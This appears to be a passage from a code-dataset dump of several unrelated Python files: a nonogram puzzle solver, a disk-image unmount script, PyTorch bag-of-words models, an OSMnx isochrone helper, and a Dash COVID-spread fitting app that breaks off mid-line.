Nonogram:\r\n#\r\n# | | | 1 | | |\r\n# | 1 | | 1 | | |\r\n# | 1 | 4 | 1 | 3 | 1 |\r\n# -------------------------\r\n# 1 | | | | | |\r\n# -------------------------\r\n# 2 | | | | | |\r\n# -------------------------\r\n# 3 | | | | | |\r\n# -------------------------\r\n# 2 1 | | | | | |\r\n# -------------------------\r\n# 4 | | | | | |\r\n# -------------------------\r\n# The clues are on the top and the left of the puzzle, so in this case:\r\n#\r\n# The horizontal clues are: ((1, 1), (4,), (1, 1, 1), (3,), (1,)),\r\n# and the vertical clues are: ((1,), (2,), (3,), (2, 1), (4,)).\r\n# The horizontal clues are given from left to right. 
If there is more than one clue for the same column,\r\n# the upper clue is given first. The vertical clues are given from top to bottom. If there is more than one clue for\r\n# the same row, the leftmost clue is given first.\r\n#\r\n# Therefore, the clue given to the __init__ method would be\r\n# (((1, 1), (4,), (1, 1, 1), (3,), (1,)), ((1,), (2,), (3,), (2, 1), (4,)))\r\n# You are given the horizontal clues first then the vertical clues second.\r\n#\r\n# You should return a tuple of the rows as your answer. In this case, the solved Nonogram looks like:\r\n#\r\n# | | | 1 | | |\r\n# | 1 | | 1 | | |\r\n# | 1 | 4 | 1 | 3 | 1 |\r\n# -------------------------\r\n# 1 | | | # | | |\r\n# -------------------------\r\n# 2 | # | # | | | |\r\n# -------------------------\r\n# 3 | | # | # | # | |\r\n# -------------------------\r\n# 2 1 | # | # | | # | |\r\n# -------------------------\r\n# 4 | | # | # | # | # |\r\n# -------------------------\r\n# In the tuple, you should use 0 for a unfilled square and 1 for a filled square. Therefore, in this case, you should return:\r\n#\r\n# ((0, 0, 1, 0, 0),\r\n# (1, 1, 0, 0, 0),\r\n# (0, 1, 1, 1, 0),\r\n# (1, 1, 0, 1, 0),\r\n# (0, 1, 1, 1, 1))\r\n# Good Luck!!\r\n#\r\n# If there is anything that is unclear or confusing, just let me know :)\r\n\r\nclass Nonogram:\r\n\r\n def __init__(self, clues):\r\n #__init__ allows the class to accept a parameter\r\n self._clues = clues\r\n pass\r\n\r\n\r\n def get_col(self, c, solution):\r\n #Gets a vertical column at index c from our 2d matrix, solution.\r\n row = [x[c] for x in solution]\r\n return row\r\n\r\n\r\n def test_row(self, row, clue):\r\n #Determine if the proposed row solution matches the clue\r\n result = [] #Will become the clue that actually matches this row\r\n seq_cnt = 0 #counts the length of a sequence of 1s\r\n for val in row:\r\n if val == 1:\r\n seq_cnt += 1\r\n else:\r\n # Add seq length to result\r\n if seq_cnt > 0:\r\n result += [seq_cnt]\r\n seq_cnt = 0\r\n #Add seq length to result\r\n if seq_cnt > 0:\r\n result += [seq_cnt]\r\n return (list(clue) == result)\r\n\r\n\r\n def generate_sols(self, row, clue):\r\n #Generates all valid combos for this row.\r\n #First generate all possible combos for this row (ignoring the clue):\r\n row_sols = [[]]\r\n for val in row:\r\n if val == -1:\r\n #We need to double the number of solutions:\r\n for i in range(len(row_sols)):\r\n #add a new row with a 1 appended:\r\n row_sols += [row_sols[i] + [1]]\r\n #append a 0 to the original:\r\n row_sols[i] += [0]\r\n else:\r\n for i in range(len(row_sols)):\r\n # Just append the known value to all solutions:\r\n row_sols[i] += [val]\r\n\r\n #Check row_sols against our clue:\r\n valid_sols = []\r\n for sol in row_sols:\r\n if self.test_row(sol, clue):\r\n valid_sols += [sol]\r\n return valid_sols\r\n\r\n\r\n def solve(self):\r\n #Determine width and height of puzzle:\r\n W = len(self._clues[0])\r\n H = len(self._clues[1])\r\n #Initialize our solution, with -1 meaning unknown:\r\n solution = [[-1]*W for x in range(H)]\r\n\r\n #Repeat the entire loop until every cell has been solved:\r\n while any(-1 in x for x in solution):\r\n ###Go through each column, from left to right:\r\n for c,clue in enumerate(self._clues[0]):\r\n row = self.get_col(c, solution)\r\n #generate each possible solution to this row:\r\n row_sols = self.generate_sols(row, clue)\r\n #Check if any cells can be locked in:\r\n for i in range(len(row)):\r\n #Dont waste time unless this cell in unknown:\r\n if row[i] == -1:\r\n #See all posible values for cell 
i:\r\n cell_options = [sol[i] for sol in row_sols]\r\n #If there is only one unique value for this cell...\r\n if len(set(cell_options)) == 1:\r\n #change the value in solution:\r\n solution[i][c] = cell_options[0]\r\n\r\n ###Go through each row, from top to bottom:\r\n for r,clue in enumerate(self._clues[1]):\r\n row = solution[r]\r\n # generate each possible solution to this row:\r\n row_sols = self.generate_sols(row, clue)\r\n # Check if any cells can be locked in:\r\n for i in range(len(row)):\r\n # Dont waste time unless this cell in unknown:\r\n if row[i] == -1:\r\n # See all posible values for cell i:\r\n cell_options = [sol[i] for sol in row_sols]\r\n # If there is only one unique value for this cell...\r\n if len(set(cell_options)) == 1:\r\n # change the value in solution:\r\n solution[r][i] = cell_options[0]\r\n\r\n # Package the solution into a tuple of tuples:\r\n return tuple(tuple(row) for row in solution)\r\n\r\n\r\n# test.it('Test 1')\r\nclues = (((1, 1), (4,), (1, 1, 1), (3,), (1,)),\r\n ((1,), (2,), (3,), (2, 1), (4,)))\r\n\r\nans = ((0, 0, 1, 0, 0),\r\n (1, 1, 0, 0, 0),\r\n (0, 1, 1, 1, 0),\r\n (1, 1, 0, 1, 0),\r\n (0, 1, 1, 1, 1))\r\n\r\nprint(Nonogram(clues).solve() == ans)\r\n\r\n# test.it('Test 2')\r\nclues = (((1,), (3,), (1,), (3, 1), (3, 1)),\r\n ((3,), (2,), (2, 2), (1,), (1, 2)))\r\n\r\nans = ((0, 0, 1, 1, 1),\r\n (0, 0, 0, 1, 1),\r\n (1, 1, 0, 1, 1),\r\n (0, 1, 0, 0, 0),\r\n (0, 1, 0, 1, 1))\r\n\r\nprint(Nonogram(clues).solve() == ans)\r\n\r\n# test.it('Test 3')\r\nclues = (((3,), (2,), (1, 1), (2,), (4,)),\r\n ((2,), (3, 1), (1, 2), (3,), (1,)))\r\n\r\nans = ((1, 1, 0, 0, 0),\r\n (1, 1, 1, 0, 1),\r\n (1, 0, 0, 1, 1),\r\n (0, 0, 1, 1, 1),\r\n (0, 0, 0, 0, 1))\r\n\r\nprint(Nonogram(clues).solve() == ans)\r\n","repo_name":"EricPWilliamson/Codewars-algorithms","sub_path":"Solutions/nonogram5x5_cw.py","file_name":"nonogram5x5_cw.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34697359553","text":"import sys\nimport os\nimport subprocess\nimport time\nimport warnings\n\nLOOP_DIR = '/mnt/loop'\n\ndef subprocess_cmd(command):\n '''\n execute command and print out result\n '''\n process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n proc_stdout = process.communicate()[0].strip()\n return proc_stdout.decode(\"utf-8\")\n\ndef umount_image():\n '''\n cleanup mounted image (umount and disconnect)\n '''\n if os.path.exists('{}/home/cisco'.format(LOOP_DIR)):\n cmd = \"sudo chown 1000:1000 {0}/home/cisco/*;\\\n sudo umount {0}/;\\\n sudo qemu-nbd --disconnect /dev/nbd0;\\n\".format(LOOP_DIR)\n subprocess_cmd(cmd)\n\nif __name__ == '__main__':\n umount_image()\n","repo_name":"ZhiyuanYaoJ/Aquarius","sub_path":"src/test/test_umount_image.py","file_name":"test_umount_image.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33381731848","text":"import numpy as np\r\nimport torch as th\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nINFINITY = 100\r\n\r\n\r\nclass BoWClassifier(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n n_layers,\r\n embed_dim,\r\n hidden_dim,\r\n n_classes,\r\n dic,\r\n dropout=0.0,\r\n ):\r\n super().__init__()\r\n # Hyper parameters\r\n self.n_layers = n_layers\r\n self.embed_dim = embed_dim\r\n self.hidden_dim = hidden_dim\r\n self.dic = dic\r\n # Word embeddings\r\n self.embed = nn.Embedding(\r\n len(dic),\r\n 
embed_dim,\r\n padding_idx=dic.pad_idx\r\n )\r\n # classifier layer\r\n dims = [embed_dim] + [hidden_dim] * (n_layers - 1) + [n_classes]\r\n layers = []\r\n for layer, (di, dh) in enumerate(zip(dims, dims[1:])):\r\n # Dropout\r\n layers.append(nn.Dropout(dropout))\r\n # Affine transform\r\n layers.append(nn.Linear(di, dh))\r\n # Non linearity\r\n if layer < n_layers - 1:\r\n layers.append(nn.ReLU())\r\n # Classifier\r\n self.output = nn.Sequential(*layers)\r\n\r\n def encode(self, x, lengths=None):\r\n \"\"\"Encode sentence into embed_dim sized vectors\"\"\"\r\n L, bsz = x.size()\r\n # Embed words\r\n x_embeds = self.embed(x)\r\n # Mask padding tokens\r\n padding_mask = x.eq(self.dic.pad_idx).unsqueeze(-1)\r\n out = x_embeds.masked_fill(padding_mask, 0)\r\n # Mean pool\r\n out = out.mean(dim=0)\r\n # Rescale for shorter sentences\r\n out = out * L / (L-padding_mask.float().sum(dim=0))\r\n return out\r\n\r\n def logits(self, x, lengths=None):\r\n \"\"\"Logits\"\"\"\r\n h = self.encode(x, lengths=lengths)\r\n return self.output(h)\r\n\r\n def nll(self, x, y, lengths=None, ls=0.0):\r\n \"\"\"Negative log-likelihood\"\"\"\r\n # Get log priobabilities\r\n logits = self.logits(x, lengths=lengths)\r\n log_p = F.log_softmax(logits, dim=-1)\r\n # Log likelihood\r\n ll = th.gather(log_p, 1, y.unsqueeze(-1)).squeeze(-1)\r\n # Interpolate with the uniform distribution\r\n if ls > 0.0:\r\n ll = (1 - ls) * ll + ls * log_p.mean(dim=1)\r\n return -ll\r\n\r\n\r\nclass BoNgramLM(nn.Module):\r\n \"\"\"[summary]\r\n\r\n Args:\r\n n_layers ([type]): [description]\r\n embed_dim ([type]): [description]\r\n hidden_dim ([type]): [description]\r\n context_size ([type]): [description]\r\n vocab_size ([type]): [description]\r\n dropout (float, optional): [description]. Defaults to 0.0.\r\n\r\n Returns:\r\n [type]: [description]\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n n_layers,\r\n embed_dim,\r\n hidden_dim,\r\n context_size,\r\n vocab_size,\r\n dropout=0.0,\r\n ):\r\n super().__init__()\r\n # Hyper parameters\r\n self.n_layers = n_layers\r\n self.embed_dim = embed_dim\r\n self.hidden_dim = hidden_dim\r\n self.context_size = context_size\r\n self.vocab_size = vocab_size\r\n self.hidden_size = vocab_size\r\n # Word embeddings\r\n self.embed = nn.Embedding(vocab_size, embed_dim)\r\n # Initial embeddings (for the -1, ... 
-context_size tokens)\r\n        if self.context_size > 1:\r\n            self.context_vectors = nn.Embedding(self.context_size-1, embed_dim)\r\n        # classifier layer\r\n        input_dim = embed_dim*context_size\r\n        dims = [input_dim] + [embed_dim] * n_layers\r\n        layers = []\r\n        for layer, (di, dh) in enumerate(zip(dims, dims[1:])):\r\n            # Dropout\r\n            layers.append(nn.Dropout(dropout))\r\n            # Affine transform\r\n            layers.append(nn.Linear(di, dh))\r\n            # Non linearity\r\n            if layer < n_layers - 1:\r\n                layers.append(nn.ReLU())\r\n        self.layers = nn.Sequential(*layers)\r\n        # Classifier\r\n        self.output = nn.Linear(embed_dim, vocab_size)\r\n\r\n    def init_weights(self):\r\n        nn.init.normal_(self.embed.weight, 0, 1/np.sqrt(self.embed_dim))\r\n        for layer in self.layers:\r\n            # only Linear layers have weights and biases; skip Dropout and ReLU\r\n            if not isinstance(layer, nn.Linear):\r\n                continue\r\n            nn.init.normal_(layer.weight, 0, 1/np.sqrt(layer.in_features))\r\n            nn.init.zeros_(layer.bias)\r\n        nn.init.normal_(self.output.weight, 0, 1/np.sqrt(self.embed_dim))\r\n        nn.init.zeros_(self.output.bias)\r\n\r\n    def forward(self, input_ids, *args):\r\n        bsz, L = input_ids.size()\r\n        # Embed words\r\n        embeds = self.embed(input_ids)\r\n        # Pad to size\r\n        if self.context_size > 1:\r\n            pad_ids = th.arange(self.context_size-1).view(1, -1).repeat(bsz, 1)\r\n            pad_vectors = self.context_vectors(pad_ids.to(embeds.device))\r\n            embeds = th.cat([pad_vectors, embeds], dim=1)\r\n        # Concat\r\n        embeds = th.cat(\r\n            [embeds[:, i:i+L]\r\n             for i in range(self.context_size)],\r\n            dim=-1\r\n        )\r\n        # Feed into the FF\r\n        h = self.layers(embeds.view(-1, self.context_size*self.embed_dim))\r\n        # Logits\r\n        logits = self.output(h).view(bsz, L, -1)\r\n        return logits\r\n\r\n\r\nclass BOWGenerative(nn.Module):\r\n    \"\"\"BoW generative model\r\n\r\n    Args:\r\n        n_layers ([type]): [description]\r\n        embed_dim ([type]): [description]\r\n        hidden_dim ([type]): [description]\r\n        vocab_size ([type]): [description]\r\n        n_classes ([type]): [description]\r\n        dropout (float, optional): [description]. Defaults to 0.0.\r\n        tie_embeddings (bool, optional): [description]. Defaults to True.\r\n        generative (bool, optional): [description]. 
Defaults to False.\r\n    \"\"\"\r\n\r\n    def __init__(\r\n        self,\r\n        vocab_size,\r\n        n_classes,\r\n        generative=False,\r\n    ):\r\n        super(BOWGenerative, self).__init__()\r\n        # Hyper parameters\r\n        self.vocab_size = vocab_size\r\n        self.n_classes = n_classes\r\n        self.hidden_size = vocab_size\r\n        self.generative = generative\r\n        # label logits\r\n        self.label_logit = nn.Embedding(1, n_classes)\r\n        # word logits\r\n        self.word_logit = nn.Embedding(n_classes, vocab_size)\r\n\r\n    def forward(\r\n        self,\r\n        labels,\r\n        x,\r\n        attention_mask=None,\r\n        token_type_ids=None,\r\n        return_embeds=False,\r\n    ):\r\n        \"\"\"Encode sentence into 2 x dh sized vectors\"\"\"\r\n        # Shape\r\n        bsz, L = x.size()\r\n        # Select logit for each word at each position depending on the label\r\n        word_logits = self.word_logit(labels.view(-1, 1).repeat(1, L-1))\r\n        word_logits = word_logits.view(bsz, (L-1), -1)\r\n        # Get label logits\r\n        if self.generative:\r\n            label_logits = self.label_logit(th.zeros_like(labels))\r\n            label_logits = label_logits.view(bsz, -1).contiguous()\r\n            logits = (word_logits, label_logits)\r\n        else:\r\n            logits = (word_logits,)\r\n        # Return logits\r\n        return logits\r\n","repo_name":"pmichel31415/P-DRO","sub_path":"src/models/bow.py","file_name":"bow.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"}
+{"seq_id":"34697359553","text":"import sys\nimport os\nimport subprocess\nimport time\nimport warnings\n\nLOOP_DIR = '/mnt/loop'\n\ndef subprocess_cmd(command):\n    '''\n    execute command and print out result\n    '''\n    process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n    proc_stdout = process.communicate()[0].strip()\n    return proc_stdout.decode(\"utf-8\")\n\ndef umount_image():\n    '''\n    cleanup mounted image (umount and disconnect)\n    '''\n    if os.path.exists('{}/home/cisco'.format(LOOP_DIR)):\n        cmd = \"sudo chown 1000:1000 {0}/home/cisco/*;\\\n        sudo umount {0}/;\\\n        sudo qemu-nbd --disconnect /dev/nbd0;\\n\".format(LOOP_DIR)\n        subprocess_cmd(cmd)\n\nif __name__ == '__main__':\n    umount_image()\n","repo_name":"ZhiyuanYaoJ/Aquarius","sub_path":"src/test/test_umount_image.py","file_name":"test_umount_image.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14440602480","text":"import math\nimport numpy as np\nimport networkx as nx\nimport osmnx as ox\nfrom shapely.geometry import Point, MultiPolygon, MultiLineString\nfrom shapely.ops import unary_union, polygonize\nfrom scipy.spatial import Delaunay\n\n\ndef alpha_shape(points, alpha):\n    \"\"\"\n    @param alpha alpha value to influence the gooeyness of the border.\n    Larger alpha values discard more points\n    \"\"\"\n\n    if len(points) < 4:\n        return MultiPolygon((list(points))).convex_hull\n\n    def add_edge(edges, edge_points, coords, i, j):\n        if (i, j) in edges or (j, i) in edges:\n            return\n        edges.add((i, j))\n        edge_points.append(coords[[i, j]])\n\n    coords = np.array([point.coords[0] for point in points])\n\n    tri = Delaunay(coords)\n    edges = set()\n    edge_points = []\n\n    for ia, ib, ic in tri.vertices:\n        pa = coords[ia]\n        pb = coords[ib]\n        pc = coords[ic]\n\n        a = math.sqrt((pa[0] - pb[0]) ** 2 + (pa[1] - pb[1]) ** 2)\n        b = math.sqrt((pb[0] - pc[0]) ** 2 + (pb[1] - pc[1]) ** 2)\n        c = math.sqrt((pc[0] - pa[0]) ** 2 + (pc[1] - pa[1]) ** 2)\n\n        s = (a + b + c) / 2.0\n\n        area = math.sqrt(s * (s - a) * (s - b) * (s - c))\n        circum_r = a * b * c / (4.0 * area)\n\n        if circum_r < 1.0 / alpha:\n            # add all three edges of the Delaunay triangle\n            add_edge(edges, edge_points, coords, ia, ib)\n            add_edge(edges, edge_points, coords, ib, ic)\n            add_edge(edges, edge_points, coords, ic, ia)\n\n    m = MultiLineString(edge_points)\n    triangles = list(polygonize(m))\n\n    return unary_union(triangles)\n\ndef create_graph(network_type, coord, time_traveling):\n    speed = 4.5\n    if network_type == 'drive_service':\n        speed = 50\n\n    G = ox.graph_from_point(coord,\n                            dist_type='network',\n                            network_type=network_type,\n                            dist=speed*float(time_traveling)/60*1000)\n\n    point_of_interest = ox.distance.nearest_nodes(G, coord[1], coord[0])\n    G = ox.project_graph(G)\n\n    if network_type == 'drive_service':\n        G = ox.speed.add_edge_speeds(G, fallback=25)\n\n        for _, _, _, data in G.edges(data=True, keys=True):\n            data['speed_kph'] = data['speed_kph'] / 1.8\n        G = ox.speed.add_edge_travel_times(G)\n\n    elif network_type == 'walk':\n        meters_per_minute = 75\n        for _, _, _, data in G.edges(data=True, keys=True):\n            data['travel_time'] = 
data['length'] / meters_per_minute\n\n    subgraph = nx.ego_graph(G,\n                            point_of_interest,\n                            radius=float(time_traveling) * speed,\n                            distance='travel_time')\n    node_points = [\n        Point((data[\"x\"], data[\"y\"])) for node, data in\n        ox.project_graph(subgraph, to_crs='epsg:4326').nodes(data=True)\n    ]\n\n    return node_points\n","repo_name":"TaranovEV/householder_gis","sub_path":"simplegis/getiso.py","file_name":"getiso.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11627462435","text":"import dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport numpy as np\nimport pandas as pd\nfrom dash.dependencies import Input, Output, State\nfrom dash.exceptions import PreventUpdate\nimport plotly.graph_objs as go\nfrom lmfit import Parameters\n\nfrom get_data import get_corona_data\nfrom logistic_model import logistic_function, LogisticModel\n\nCOLORS = ['rgb(31, 119, 180)', 'rgb(255, 127, 14)',\n          'rgb(44, 160, 44)', 'rgb(214, 39, 40)',\n          'rgb(148, 103, 189)', 'rgb(140, 86, 75)',\n          'rgb(227, 119, 194)', 'rgb(127, 127, 127)',\n          'rgb(188, 189, 34)', 'rgb(23, 190, 207)']\n\nexternal_stylesheets = [dbc.themes.BOOTSTRAP, 'https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nserver = app.server\n\napp.layout = dbc.Container(\n    children=[\n        dcc.Store(id='corona-data', ),\n        dcc.Store(id='population-data'),\n        html.Div(\n            [\n                dbc.Row(\n                    [\n                        dbc.Col(html.Button('Reload data.', id='reload-button'), width='auto'),\n                        dbc.Col(dcc.Dropdown(\n                            options=[{'label': country, 'value': country} for country in ('Germany', 'France')],\n                            id='country-dropdown',\n                            value='Germany',\n                        )),\n                        dbc.Col(html.Button('Fit data', id='fit-button'), width='auto')\n                    ]\n                ),\n                dcc.Graph(id='figure'),\n                dbc.Row(\n                    [\n                        dbc.Col(dbc.ButtonGroup(\n                            [\n                                dbc.Button(\"Linear\"),\n                                dbc.Button(\"Logarithmic\")\n                            ]\n                        ), width='auto'),\n                        html.Label(id='range-label'),\n                        dbc.Col(dcc.RangeSlider(\n                            min=0,\n                            max=200,\n                            value=[0, 200],\n                            id='range-slider'\n                        ))\n                    ]\n                ),\n            ], style={\"border\": \"1px black solid\", \"border-radius\": \"5px\", \"border-color\": \"grey\",\n                      \"padding\": \"12px 25px 25px 25px\"}\n        ),\n        html.Div(\n            [\n                html.H3(\"Spread of the virus\"),\n                html.P(r\"The infection rate results from the average number of contacts \"\n                       r\" and the probability p of infection per contact. 
If the infection rate"\n                       r" is greater than the recovery rate, the virus spreads exponentially."),\n                html.Label(id='infection-label'),\n                dcc.Slider(\n                    id='infection-slider',\n                    min=0,\n                    max=1,\n                    step=0.01,\n                    marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n                    value=0.1,\n                    disabled=True\n                ),\n                dbc.Row(\n                    [\n                        dbc.Col(\n                            dbc.FormGroup(\n                                [\n                                    dbc.Label(id='infection_probability-label'),\n                                    dcc.Slider(\n                                        id='infection_probability-slider',\n                                        min=0,\n                                        max=1,\n                                        step=0.01,\n                                        marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n                                        value=0.1,\n                                    )\n                                ]\n                            )\n                        ),\n                        dbc.Col(\n                            dbc.FormGroup(\n                                [\n                                    html.Label(id='number_contact-label'),\n                                    dcc.Slider(\n                                        id='number_contact-slider',\n                                        min=0,\n                                        max=20,\n                                        step=0.1,\n                                        marks={np.round(i, 1): str(np.round(i, 1)) for i in np.arange(0, 20, 1.)},\n                                        value=2,\n                                    ),\n                                ]\n                            )\n                        )\n                    ]\n                ),\n                html.Label('Initially infected:'),\n                dcc.Input(\n                    id='initial-input',\n                    type='number',\n                    value=10\n                )\n            ], style={\"border\": \"1px black solid\", \"border-radius\": \"5px\", \"border-color\": \"grey\",\n                      \"padding\": \"12px 25px 25px 25px\"}\n        ),\n        html.Div(\n            [\n                html.H3(\"Decline of the virus\"),\n                html.P(\"Neither the recovered nor the deceased can spread the virus any further. For the \"\n                       \"infection of new people an effective reduction rate is therefore relevant, which results \"\n                       \"from the recovery rate and the mortality.\"),\n                dbc.Label(id='reduction-label'),\n                dcc.Slider(\n                    id='reduction-slider',\n                    min=0,\n                    max=1,\n                    step=0.001,\n                    marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n                    disabled=True\n                ),\n                dbc.Row(\n                    [\n                        dbc.Col(\n                            dbc.FormGroup(\n                                [\n                                    dbc.Label(id='recovery-label'),\n                                    dcc.Slider(\n                                        id='recovery-slider',\n                                        min=0,\n                                        max=1,\n                                        step=0.01,\n                                        marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n                                        value=0.5,\n                                    )\n                                ]\n                            )\n                        ),\n                        dbc.Col(\n                            dbc.FormGroup(\n                                [\n                                    dbc.Label(id='mortality-label'),\n                                    dcc.Slider(\n                                        id='mortality-slider',\n                                        min=0,\n                                        max=10,\n                                        step=0.1,\n                                        marks={i: str(i) + \"%\" for i in range(11)},\n                                        # marks={np.round(i, 1): str(np.round(i, 1)) for i in np.arange(0., 11., 1.)},\n                                        value=1,\n                                    )\n                                ]\n                            )\n                        )\n                    ]\n                )\n            ], style={\"border\": \"1px black solid\", \"border-radius\": \"5px\", \"border-color\": \"grey\",\n                      \"padding\": \"12px 25px 25px 25px\"}\n        ),\n    ])\n\n\n@app.callback(\n    Output('corona-data', 'data'),\n    [Input('reload-button', 'n_clicks')],\n    [State('corona-data', 'data')]\n)\ndef load_data(clicks, corona_data):\n    if clicks is None:\n        raise PreventUpdate\n    data_country = get_corona_data().reset_index()\n    return data_country.to_json()\n\n\n@app.callback(\n    Output('population-data', 'data'),\n    [Input('reload-button', 'n_clicks')],\n    [State('population-data', 'data')]\n)\ndef load_population_data(clicks, data):\n    if clicks is None:\n        raise PreventUpdate\n    population_url = 'https://raw.githubusercontent.com/datasets/population/master/data/population.csv'\n    population = pd.read_csv(population_url)\n    population = population.set_index(['Country Name', 'Year']).Value\n    return population.unstack().iloc[:, -1].to_json()\n\n\n@app.callback(\n    [Output('country-dropdown', 'options'),\n     Output('range-slider', 'value')],\n    [Input('corona-data', 'modified_timestamp')],\n    [State('corona-data', 'data')]\n)\ndef update_country_dropdown(ts, data):\n    if ts is None:\n        raise PreventUpdate\n    data = pd.read_json(data)\n    countries = data['Country/Region'].unique()\n\n    data = data.set_index('Country/Region', inplace=False).loc['Germany']\n    data = data.set_index('Date')\n    dates 
= data.index.dayofyear - data.index.dayofyear[0]\n return [{'label': country, 'value': country} for country in countries], (dates.min(), dates.max())\n\n\n@app.callback(\n Output('range-label', 'children'),\n [Input('range-slider', 'value')]\n)\ndef update_label(values):\n return 'Fit Bereich: Tag {} bis Tag {}'.format(values[0], values[1])\n\n\n@app.callback(\n [Output('infection_probability-slider', 'value'),\n Output('recovery-slider', 'value'),\n Output('initial-input', 'value')],\n [Input('fit-button', 'n_clicks'),\n Input('range-slider', 'value')],\n [State('country-dropdown', 'value'),\n State('number_contact-slider', 'value'),\n State('mortality-slider', 'value'),\n State('corona-data', 'data'),\n State('population-data', 'data')]\n)\ndef fit_data(clicks, fit_range, country,\n number_contact, mortality,\n corona_data, population_data):\n if clicks is None:\n raise PreventUpdate\n data = pd.read_json(corona_data)\n data_country = data.set_index('Country/Region').loc[country]\n data_country = data_country.set_index('Date')\n dates = data_country.index.dayofyear - data_country.index.dayofyear[0]\n data_country.index = dates\n data_country = data_country.iloc[(data_country.index >= fit_range[0]) * (data_country.index <= fit_range[1])]\n population = pd.read_json(population_data, typ='series').loc[country]\n\n model = LogisticModel\n logistic_params = Parameters()\n logistic_params.add('infection_rate', value=0.01, min=0)\n logistic_params.add('recover_rate', value=0.01, max=1)\n logistic_params.add('infected_0', value=1e-3, min=0, max=1)\n logistic_params.add('mortality', value=mortality/100, min=0, max=1, vary=False)\n fit = model.fit(data_country['Active Cases']/population, params=logistic_params, time=data_country.index,\n method='powell')\n infected_0 = fit.eval(params=fit.params, time=[-fit_range[0]])[0]\n print(infected_0, fit.best_values['infected_0'])\n return (fit.best_values['infection_rate']/number_contact,\n fit.best_values['recover_rate']/(1 + mortality/100),\n infected_0 * population)\n\n\n@app.callback(\n Output('infection-label', 'children'),\n [Input('infection-slider', 'value')]\n)\ndef update_infection(value):\n return 'Infectionsrate: {}'.format(round(value, 2))\n\n\n@app.callback(\n Output('infection-slider', 'value'),\n [Input('infection_probability-slider', 'value'),\n Input('number_contact-slider', 'value')]\n)\ndef update_infection(probability, number):\n return probability * number\n\n\n@app.callback(\n Output('number_contact-label', 'children'),\n [Input('number_contact-slider', 'value')]\n)\ndef update_infection(value):\n return 'Durchschnittliche anzahl Kontakte pro Tag: {}'.format(round(value, 1))\n\n\n@app.callback(\n Output('infection_probability-label', 'children'),\n [Input('infection_probability-slider', 'value')]\n)\ndef update_infection(value):\n return 'Wahrscheinlichkeit einer Ansteckung pro Kontakt: {}'.format(round(value, 2))\n\n\n@app.callback(\n Output('reduction-slider', 'value'),\n [Input('recovery-slider', 'value'),\n Input('mortality-slider', 'value')]\n)\ndef calculate_reduction(recovery, mortality):\n return recovery * (1 + mortality/100)\n\n\n@app.callback(\n Output('reduction-label', 'children'),\n [Input('reduction-slider', 'value')]\n)\ndef update_infection(value):\n return 'Reductionsrate: {}'.format(round(value, 2))\n\n\n@app.callback(\n Output('recovery-label', 'children'),\n [Input('recovery-slider', 'value')]\n)\ndef update_infection(value):\n return 'Genesungsrate: {}'.format(round(value, 2))\n\n\n@app.callback(\n 
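The derived-slider callbacks above encode two identities: infection_rate = infection probability times contacts per day, and reduction_rate = recovery_rate * (1 + mortality/100). logistic_function itself is defined elsewhere in this repo; the following forward-Euler sketch of an SIR-style system is only an assumed stand-in to illustrate the threshold behaviour the intro text describes:

import numpy as np

def simulate(infection_rate, recovery_rate, mortality, infected_0, days=100):
    # crude forward-Euler integration, one step per day; fractions of population
    s, i, r, d = 1.0 - infected_0, infected_0, 0.0, 0.0
    out = []
    for _ in range(days):
        new_inf = infection_rate * s * i
        new_rec = recovery_rate * i
        new_dead = recovery_rate * (mortality / 100) * i
        s -= new_inf
        i += new_inf - new_rec - new_dead
        r += new_rec
        d += new_dead
        out.append((s, i, r, d))
    return np.array(out)

# The virus spreads only while the infection rate exceeds the effective
# reduction rate:
p, contacts, recovery, mortality = 0.1, 2, 0.5, 1.0
print(p * contacts > recovery * (1 + mortality / 100))   # False: dies out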
Output('mortality-label', 'children'),\n [Input('mortality-slider', 'value')]\n)\ndef update_infection(value):\n return 'Mortalität: {}%'.format(round(value, 1))\n\n\n@app.callback(\n Output('figure', 'figure'),\n [Input('reload-button', 'n_clicks'),\n Input('infection-slider', 'value'),\n Input('recovery-slider', 'value'),\n Input('mortality-slider', 'value'),\n Input('initial-input', 'value'),\n Input('corona-data', 'modified_timestamp'),\n Input('population-data', 'modified_timestamp'),\n Input('country-dropdown', 'value')],\n [State('range-slider', 'value'),\n State('corona-data', 'data'),\n State('population-data', 'data')]\n)\ndef update_figure(clicks, infection_rate, recovery_rate, mortality, infected_0,\n corona_ts, population_ts, country, fit_range, corona_data, population_data):\n if corona_ts is None:\n raise PreventUpdate\n data = pd.read_json(corona_data)\n data_country = data.set_index('Country/Region').loc[country]\n data_country = data_country.set_index('Date')\n dates = data_country.index.dayofyear - data_country.index.dayofyear[0]\n population = pd.read_json(population_data, typ='series').loc[country]\n dates_fit = np.linspace(fit_range[0], fit_range[1], 50)\n\n infected, recovered, deaths = logistic_function(\n dates_fit, infection_rate=infection_rate, recover_rate=recovery_rate, mortality=mortality/100,\n infected_0=infected_0/population\n )\n\n return {\n 'data': [\n {'x': dates_fit, 'y': population * infected, 'type': 'line', 'name': 'Infizierte'},\n {'x': dates_fit, 'y': population * recovered, 'type': 'line', 'name': 'Genesene'},\n {'x': dates_fit, 'y': population * 